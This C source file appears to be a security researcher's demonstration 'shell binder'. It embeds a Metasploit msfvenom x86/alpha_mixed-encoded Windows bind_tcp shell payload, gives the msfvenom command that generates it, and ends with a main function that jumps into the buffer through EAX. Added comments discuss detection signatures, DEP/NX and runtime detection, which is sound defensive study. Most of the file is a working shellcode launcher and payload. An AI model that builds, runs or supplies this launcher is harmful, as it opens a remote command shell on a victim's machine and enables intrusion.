/*
Filename: alphamixed.c
Author: Daniel Sauder
Website: http://govolution.wordpress.com
License: http://creativecommons.org/licenses/by-sa/3.0/
Purpose: Demonstrate a shell binder for msf alpha_mixed encoded shellcode
compile: wine gcc -m32 -ffixed-eax alphamixed.c
*/
#include <stdio.h>
/*
msfvenom -a x86 --platform windows -p windows/shell/bind_tcp -e x86/alpha_mixed BufferRegister=EAX -f c
*/
/*
 * buf holds the encoded payload produced by the msfvenom command quoted in
 * the comment above (encoder x86/alpha_mixed, BufferRegister=EAX).
 *
 * Notes for anyone analysing or writing detections for this sample:
 *  - The bytes are written as \x escapes, but read as ASCII the array starts
 *    with "PY" followed by sixteen 'I' characters (0x49). The named encoder
 *    is meant to emit only mixed-case alphanumeric bytes, so a filter that
 *    merely rejects non-printable input does not stop this kind of blob.
 *  - NOTE(review): that leading "PY" + 'I' run is presumably constant for
 *    this encoder/register choice, which would make it a usable anchor for a
 *    static string signature; confirm against other samples before relying
 *    on it.
 *  - The initialiser is a string literal, so the array also carries one
 *    trailing NUL byte after the last escape shown.
 *  - The array is non-const with static storage; it is expected to land in a
 *    writable data section rather than in code (verify in the built binary).
 */
unsigned char buf[] =
"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x38\x68\x4c\x42\x75\x50"
"\x35\x50\x63\x30\x43\x50\x6c\x49\x49\x75\x56\x51\x79\x50\x43"
"\x54\x6e\x6b\x46\x30\x50\x30\x6e\x6b\x56\x32\x54\x4c\x4e\x6b"
"\x43\x62\x55\x44\x6e\x6b\x61\x62\x64\x68\x36\x6f\x4e\x57\x31"
"\x5a\x44\x66\x75\x61\x6b\x4f\x4c\x6c\x37\x4c\x30\x61\x71\x6c"
"\x53\x32\x36\x4c\x71\x30\x69\x51\x38\x4f\x54\x4d\x35\x51\x6f"
"\x37\x78\x62\x6b\x42\x56\x32\x61\x47\x6e\x6b\x32\x72\x44\x50"
"\x6e\x6b\x61\x5a\x55\x6c\x4e\x6b\x62\x6c\x77\x61\x30\x78\x48"
"\x63\x53\x78\x55\x51\x58\x51\x50\x51\x4c\x4b\x70\x59\x75\x70"
"\x55\x51\x5a\x73\x6c\x4b\x53\x79\x36\x78\x79\x73\x37\x4a\x50"
"\x49\x6e\x6b\x54\x74\x4c\x4b\x45\x51\x39\x46\x70\x31\x49\x6f"
"\x6e\x4c\x6f\x31\x48\x4f\x76\x6d\x36\x61\x6a\x67\x66\x58\x6d"
"\x30\x61\x65\x6c\x36\x73\x33\x51\x6d\x6a\x58\x57\x4b\x51\x6d"
"\x71\x34\x43\x45\x6b\x54\x56\x38\x4e\x6b\x53\x68\x66\x44\x53"
"\x31\x68\x53\x53\x56\x6c\x4b\x76\x6c\x32\x6b\x4e\x6b\x33\x68"
"\x57\x6c\x43\x31\x6b\x63\x4e\x6b\x54\x44\x6e\x6b\x46\x61\x7a"
"\x70\x4d\x59\x72\x64\x55\x74\x51\x34\x63\x6b\x73\x6b\x65\x31"
"\x42\x79\x62\x7a\x46\x31\x4b\x4f\x39\x70\x31\x4f\x43\x6f\x70"
"\x5a\x6e\x6b\x65\x42\x68\x6b\x4c\x4d\x73\x6d\x61\x78\x57\x43"
"\x66\x52\x75\x50\x47\x70\x42\x48\x33\x47\x42\x53\x46\x52\x43"
"\x6f\x76\x34\x43\x58\x30\x4c\x64\x37\x77\x56\x63\x37\x4b\x4f"
"\x59\x45\x68\x38\x6c\x50\x77\x71\x63\x30\x63\x30\x36\x49\x68"
"\x44\x30\x54\x70\x50\x70\x68\x65\x79\x4d\x50\x50\x6b\x35\x50"
"\x4b\x4f\x79\x45\x50\x6a\x64\x4b\x31\x49\x52\x70\x78\x62\x59"
"\x6d\x53\x5a\x67\x71\x51\x7a\x44\x42\x63\x58\x7a\x4a\x56\x6f"
"\x49\x4f\x79\x70\x6b\x4f\x58\x55\x6c\x57\x31\x78\x67\x72\x67"
"\x70\x74\x51\x71\x4c\x6d\x59\x68\x66\x32\x4a\x42\x30\x36\x36"
"\x70\x57\x51\x78\x4f\x32\x49\x4b\x30\x37\x72\x47\x79\x6f\x39"
"\x45\x6d\x55\x6f\x30\x71\x65\x36\x38\x33\x67\x51\x78\x48\x37"
"\x78\x69\x67\x48\x79\x6f\x69\x6f\x7a\x75\x52\x77\x72\x48\x51"
"\x64\x48\x6c\x47\x4b\x39\x71\x49\x6f\x4a\x75\x76\x37\x6c\x57"
"\x53\x58\x64\x35\x30\x6e\x30\x4d\x33\x51\x6b\x4f\x7a\x75\x42"
"\x4a\x47\x70\x52\x4a\x67\x74\x66\x36\x71\x47\x70\x68\x67\x72"
"\x68\x59\x79\x58\x53\x6f\x49\x6f\x4e\x35\x4d\x53\x79\x68\x57"
"\x70\x71\x6e\x64\x6d\x4e\x6b\x37\x46\x51\x7a\x47\x30\x63\x58"
"\x63\x30\x44\x50\x75\x50\x77\x70\x56\x36\x52\x4a\x37\x70\x50"
"\x68\x36\x38\x4c\x64\x71\x43\x4a\x45\x59\x6f\x6a\x75\x4f\x63"
"\x66\x33\x51\x7a\x63\x30\x56\x36\x52\x73\x56\x37\x32\x48\x67"
"\x72\x6a\x79\x5a\x68\x61\x4f\x79\x6f\x5a\x75\x4e\x63\x4b\x48"
"\x45\x50\x31\x6e\x75\x57\x33\x31\x6b\x73\x65\x79\x78\x46\x64"
"\x35\x69\x79\x38\x43\x41\x41";
/*
 * main: loads the address of buf into EAX and makes an indirect call to it,
 * i.e. it treats the data array as code. argc and argv are accepted but not
 * used, and there is no explicit return statement.
 *
 * Defensive context: control flow that leaves the image's code section and
 * lands in a data buffer is the behaviour DEP/NX is designed to stop; where
 * DEP/NX is enforced for the process, the call is expected to fault rather
 * than run. It is also a useful runtime detection point (a thread executing
 * from memory that is not backed by an executable image section).
 */
int main(int argc, char **argv)
{
/* GCC explicit register variable: r is bound to the EAX register. */
register unsigned char* r asm("eax");
/*
 * Put buf's address in EAX. The msfvenom comment above sets
 * BufferRegister=EAX, so the encoded data presumably expects EAX to point
 * at its own start when it is entered.
 */
r=buf;
/*
 * Indirect call through EAX. This asm statement lists no operands, so the
 * compiler is not told that it depends on r; the -ffixed-eax flag in the
 * file header's compile line is presumably what keeps the compiler from
 * reusing EAX between the assignment and the call. NOTE(review): without
 * that flag the value in EAX at this point is not guaranteed.
 */
asm("call *%eax;");
}